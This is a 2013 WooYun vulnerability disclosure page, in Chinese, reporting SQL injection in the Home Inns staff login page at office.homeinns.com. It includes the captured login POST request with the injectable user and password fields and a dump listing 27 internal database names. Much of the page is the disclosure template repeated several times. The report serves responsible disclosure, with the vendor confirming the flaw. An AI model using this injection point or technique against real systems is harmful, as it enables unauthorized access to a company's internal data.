如家SQL注入漏洞，涉及N多个库 | wooyun-2013-043186| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043186

漏洞标题：如家SQL注入漏洞，涉及N多个库

漏洞作者：小胖子

提交时间：2013-11-17 20:45

修复时间：2014-01-01 20:45

公开时间：2014-01-01 20:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-17：细节已通知厂商并且等待厂商处理中
2013-11-17：厂商已经确认，细节仅向厂商公开
2013-11-27：细节向核心白帽子及相关领域专家公开
2013-12-07：细节向普通白帽子公开
2013-12-17：细节向实习白帽子公开
2014-01-01：细节向公众公开

简要描述：

发现如家注册了...

详细说明：

漏洞地址：
office.homeinns.com
这个地址下涉及好多个系统！
office.homeinns.com/staffinfo/‎
office.homeinns.com/hcs/‎
等等...
注入点：
office.homeinns.com/staffinfo/login.aspx
登陆没有过滤，导致注射！
抓登陆包！

POST /staffinfo/login.aspx HTTP/1.1
Host: office.homeinns.com
Proxy-Connection: keep-alive
Content-Length: 203
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://office.homeinns.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://office.homeinns.com/staffinfo/login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=otxuq455k1anlkjcnfb3p245; NSC_WJQ_172.23.100.65=ffffffffaf1f7a5045525d5f4f58455e445a4a423660
__VIEWSTATE=%2FwEPDwUKMTk5MDQ2MDAwNmRkTaja6ST7t3GaH7rq30kvNrZxaGk%3D&__EVENTVALIDATION=%2FwEWBQKCmuahCQLT8dy8BQK1qbSRCwKM54rGBgK7q7GGCOJQVCNxCc3j8yhcNg%2FDVzetIsVA&txtUserID=1&txtPassword=1&Button1=Enter

果断是注入了~

读出来的数据！

current database:    'Staffinfo'

available databases [27]:
[*] [Smart eVision]
[*] [Smart eVision_2010_4_26_12_11_bak]
[*] [Smart eVision_2010_5_19_11_11_bak]
[*] App
[*] BBS
[*] HomeInnsDW
[*] HomeinnsSurvey
[*] ITOperationDB
[*] jbClub
[*] km
[*] Manage_Survey
[*] Manage_Survey_test
[*] ManageDB
[*] ManageDBTest
[*] master
[*] model
[*] msdb
[*] NCExport
[*] PraseDB
[*] PRM
[*] QC
[*] Rujia_equipment
[*] Staffinfo
[*] Staffinfo_Test
[*] tempdb
[*] Test
[*] UserInfoBus_Test

27个数据库，就不再列详细数据啦。

漏洞证明：

见详细说明。

修复方案：

0x1：登陆框过滤。
0x2：求20rank！

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2013-11-17 20:57

厂商回复：

感谢关注！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043186

漏洞标题：如家SQL注入漏洞，涉及N多个库

相关厂商：如家酒店集团

漏洞作者：小胖子

提交时间：2013-11-17 20:45

修复时间：2014-01-01 20:45

公开时间：2014-01-01 20:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043186

漏洞标题：如家SQL注入漏洞，涉及N多个库

相关厂商：如家酒店集团

漏洞作者： 小胖子

提交时间：2013-11-17 20:45

修复时间：2014-01-01 20:45

公开时间：2014-01-01 20:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-043186"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小胖子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小胖子@乌云